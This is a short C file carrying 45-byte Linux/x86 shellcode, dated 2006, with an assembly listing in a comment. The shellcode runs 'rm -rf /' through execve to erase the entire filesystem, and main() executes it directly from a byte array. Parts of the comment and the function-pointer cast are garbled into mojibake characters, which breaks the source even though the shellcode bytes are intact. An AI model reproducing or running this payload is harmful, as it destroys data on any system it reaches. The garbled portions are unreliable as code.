/* By Kris Katterjohn 11/18/2006
 *
 * 45 byte shellcode to execve("rm -rf /") for Linux/x86
 *
 *
 *
 * section .text
 *
 *      Á´À¤³¦¤Î _start
 *
 * _start:
 *
 * ; execve("/Ãù¢½ê/rm", { "/Ãù¢½ê/rm", "-r", "-f", "/", NULL }, NULL)
 *
 *      ²¡¤·¿Ê¤á¤ë byte 11
 *      pop eax
 *      cdq
 *      ²¡¤·¿Ê¤á¤ë edx
 *      ²¡¤·¿Ê¤á¤ë byte 0x2f
 *      mov edi, esp
 *      ²¡¤·¿Ê¤á¤ë edx
 *      ²¡¤·¿Ê¤á¤ë word 0x662d
 *      mov esi, esp
 *      ²¡¤·¿Ê¤á¤ë edx
 *      ²¡¤·¿Ê¤á¤ë word 0x722d
 *      mov ecx, esp
 *      ²¡¤·¿Ê¤á¤ë edx
 *      ²¡¤·¿Ê¤á¤ë 0x6d722f2f
 *      ²¡¤·¿Ê¤á¤ë 0x6e69622f
 *      mov ebx, esp
 *      ²¡¤·¿Ê¤á¤ë edx
 *      ²¡¤·¿Ê¤á¤ë edi
 *      ²¡¤·¿Ê¤á¤ë esi
 *      ²¡¤·¿Ê¤á¤ë ecx
 *      ²¡¤·¿Ê¤á¤ë ebx
 *      mov ecx, esp
 *      int 0x80
 */

main()
{
       char shellcode[] =
               "\x6a\x0b\x58\x99\x52\x6a\x2f\x89\xe7\x52\x66\x68\x2d\x66\x89"
               "\xe6\x52\x66\x68\x2d\x72\x89\xe1\x52\x68\x2f\x2f\x72\x6d\x68"
               "\x2f\x62\x69\x6e\x89\xe3\x52\x57\x56\x51\x53\x89\xe1\xcd\x80";

       (*(̵¸ú¤Î (*)()) shellcode)();
}